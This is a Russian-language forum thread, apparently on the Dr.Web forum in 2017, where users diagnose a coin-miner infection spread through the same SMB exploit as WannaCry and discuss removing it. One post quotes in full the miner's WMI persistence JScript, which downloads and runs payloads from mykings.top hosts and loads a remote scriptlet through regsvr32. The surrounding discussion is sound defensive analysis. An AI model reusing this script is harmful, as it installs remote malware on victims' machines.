54 ответов в этой теме

[stan12]

 

 

 

тоже вроде его словил пару дней назад, но он ничего вроде не успел сделать, сразу удалил. проверь ветку реестра  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\clr_optimization_v4.0.30339_32, там был прописан его запуск

 

да sppsrv.exe кинь на https://www.virustotal.com/ 

 

др.веб его уже удалил

 

я и папку clr_optimization_v4.0.30339_32 в реестре удалил.

 

 

Danya_Dark,

так что у вас было? майнеры или все таки шифратор WanaCrypt0r к вам в гости без спроса пытался зайти?

 

Честно говоря, не знаю. Но после обновления всё прекратилось. Повторный анализ диска С не выявил угроз. Видимо всё-таки wanna decryptor это был. Спасибо, Dmitry Shutov. Думаю, тему можно закрыть.

 

был бы wana, у тебя бы сразу все зашифровало, это простой майнер

[Danya_Dark]

 

 

 

 

тоже вроде его словил пару дней назад, но он ничего вроде не успел сделать, сразу удалил. проверь ветку реестра  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\clr_optimization_v4.0.30339_32, там был прописан его запуск

 

да sppsrv.exe кинь на https://www.virustotal.com/ 

 

др.веб его уже удалил

 

я и папку clr_optimization_v4.0.30339_32 в реестре удалил.

 

 

Danya_Dark,

так что у вас было? майнеры или все таки шифратор WanaCrypt0r к вам в гости без спроса пытался зайти?

 

Честно говоря, не знаю. Но после обновления всё прекратилось. Повторный анализ диска С не выявил угроз. Видимо всё-таки wanna decryptor это был. Спасибо, Dmitry Shutov. Думаю, тему можно закрыть.

 

был бы wana, у тебя бы сразу все зашифровало, это простой майнер

 

я не уверен что это майнер. Если бы это был майнер, он бы меня и сейчас долбал т.к. я ничего кроме обновления не предпринял.

[stan12]

 

 

 

 

 

тоже вроде его словил пару дней назад, но он ничего вроде не успел сделать, сразу удалил. проверь ветку реестра  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\clr_optimization_v4.0.30339_32, там был прописан его запуск

 

да sppsrv.exe кинь на https://www.virustotal.com/ 

 

др.веб его уже удалил

 

я и папку clr_optimization_v4.0.30339_32 в реестре удалил.

 

 

Danya_Dark,

так что у вас было? майнеры или все таки шифратор WanaCrypt0r к вам в гости без спроса пытался зайти?

 

Честно говоря, не знаю. Но после обновления всё прекратилось. Повторный анализ диска С не выявил угроз. Видимо всё-таки wanna decryptor это был. Спасибо, Dmitry Shutov. Думаю, тему можно закрыть.

 

был бы wana, у тебя бы сразу все зашифровало, это простой майнер

 

я не уверен что это майнер. Если бы это был майнер, он бы меня и сейчас долбал т.к. я ничего кроме обновления не предпринял.

 

wana серьезный вирус, тут бы простым удаление файла не отделался как в данном случае

[Danya_Dark]

 

 

 

 

 

 

тоже вроде его словил пару дней назад, но он ничего вроде не успел сделать, сразу удалил. проверь ветку реестра  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\clr_optimization_v4.0.30339_32, там был прописан его запуск

 

да sppsrv.exe кинь на https://www.virustotal.com/ 

 

др.веб его уже удалил

 

я и папку clr_optimization_v4.0.30339_32 в реестре удалил.

 

 

Danya_Dark,

так что у вас было? майнеры или все таки шифратор WanaCrypt0r к вам в гости без спроса пытался зайти?

 

Честно говоря, не знаю. Но после обновления всё прекратилось. Повторный анализ диска С не выявил угроз. Видимо всё-таки wanna decryptor это был. Спасибо, Dmitry Shutov. Думаю, тему можно закрыть.

 

был бы wana, у тебя бы сразу все зашифровало, это простой майнер

 

я не уверен что это майнер. Если бы это был майнер, он бы меня и сейчас долбал т.к. я ничего кроме обновления не предпринял.

 

wana серьезный вирус, тут бы простым удаление файла не отделался как в данном случае

 

я и не отделался. я что только не удалял. сканировал раза 3 и даже после обезвреживания подозрительных файлов вирус стучался ко мне всё-равно. с разным промежутком кстати. а самого источника не было, он просто из неоткуда появлялся.

[Ivan Korolev]

Все правильно, это был майнер, который использовал тот же самый эксплойт для SMB, что и шифровальщик wanna cry.

 

Установка обновления ОС избавила вас от возможности получить обе заразы.

Сообщение было изменено Ivan Korolev: 17 Май 2017 - 09:29

[AndreyKa]

Все правильно, это был майнер, который использовал тот же самый эксплойт для SMB, что и шифровальщик wanna cry.

 

Установка обновления ОС избавила вас от возможности получить обе заразы.

С каких пор trojan.encoder.11432 стал майнером? https://forum.drweb.com/index.php?showtopic=327526#entry827435

[Ivan Korolev]

 

Все правильно, это был майнер, который использовал тот же самый эксплойт для SMB, что и шифровальщик wanna cry.

 

Установка обновления ОС избавила вас от возможности получить обе заразы.

С каких пор trojan.encoder.11432 стал майнером? https://forum.drweb.com/index.php?showtopic=327526#entry827435

 

 

Это было ответом на:

 

 

 

я не уверен что это майнер. Если бы это был майнер, он бы меня и сейчас долбал т.к. я ничего кроме обновления не предпринял.

 

Так-то я по-диагонали читал топик, мб на рассуждения о майнерах тут съехали зря

Сообщение было изменено Ivan Korolev: 17 Май 2017 - 11:10

[Dmitry Shutov]

У автора стучались оба...майнер и WannaCry (эксплойт SMB), установив патч...уязвимость закрыли.

 

Вот свежая статья от Eset:

 

 

WannaCryptor wasn’t the first to use EternalBlue: Miners misused it days after Shadow Brokers leak

 

https://drw.sh/ituhcc

 

https://www.virustotal.com/en/file/b6c0dc914392b2274a4be3446c70731c81f484a2f4a6608b4deecda71b02edd9/analysis/

 

DrWeb BackDoor.Spy.422

 

ESET-NOD32 a variant of Win32/CoinMiner.AFR

 

В статье речь как раз об майнере что вскоре после утечки Shadow Brokers стал массово распространятся используя уязвимость в SMB.

Сообщение было изменено Dmitry Shutov: 17 Май 2017 - 19:56

[AndreyKa]

Майнеры месяцами работают незаметно для пользователей. Никому эта тема не интересна.

[l.e.e.]

Никому эта тема не интересна.

А дыра через которую они работали ? 

[santy]

 

Никому эта тема не интересна.

А дыра через которую они работали ? 

 

эта тема была не менее интересна, но здесь она была закрыта:

https://forum.drweb.com/index.php?showtopic=327461

 

а здесь

https://forum.kasperskyclub.ru/index.php?showtopic=55590

и

здесь

http://www.tehnari.ru/f183/t253600/

решена,

как раз накануне атаки WNCry

темы по этим майнерам появились на форумам где-то неделей раньше. Непонятно было, почему после удаления ссылок на закачку вредоносных программ из задач и автозапуска,

последние восстанавливались вновь.

 

оказалось, что восстанавливались они через механизм WMI, через добавленные скрипты, которые выполнялись обработчиками событий.

 

var toff=3000;var url1 = "хттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="хттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:хттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");

 

 

найти эти скрипты получилось через autoruns Руссиновича (в секции WMI), а так же через обновление uVS до версии 4.0.3, которое было выпущено для решения данной проблемы.

[Danya_Dark]

 

Все правильно, это был майнер, который использовал тот же самый эксплойт для SMB, что и шифровальщик wanna cry.

 

Установка обновления ОС избавила вас от возможности получить обе заразы.

С каких пор trojan.encoder.11432 стал майнером? https://forum.drweb.com/index.php?showtopic=327526#entry827435

 

у меня несколько вирусов было.

 

[Danya_Dark]

Вот этот файлик на анализ в вирусную лабораторию https://vms.drweb.ru/sendvirus/?lng=ru 
 
C:\windows\start.exe
 
https://www.virustotal.com/en/file/6d09674a6695ea0dd4dd28bedcc0b68edd4ee0d58cf9cc2e14ad164b68c9a2de/analysis/

 

Пришло сообщение по этому поводу

 

Добрый день,


Ваш запрос был проанализирован. Соответствующая запись добавлена в вирусную базу Dr.Web и будет доступна при следующем обновлении.

Угроза: Trojan.Starter.7267




Спасибо за сотрудничество.

 

 

Письмо пришло 19 мая. Я прочитал его 23 мая и после прочтения побежал удалять файл, но его там уже не было. Его др.веб удалил? просто сообщений не было по этому поводу от доктора.

[Nenya Amo]

Его др.веб удалил?

В статистике угроз смотрите за период с 18 - 23

[Danya_Dark]

 

Его др.веб удалил?

В статистике угроз смотрите за период с 18 - 23

 

все. он в карантине валяется. странно, что забыл там проверить. спасибо.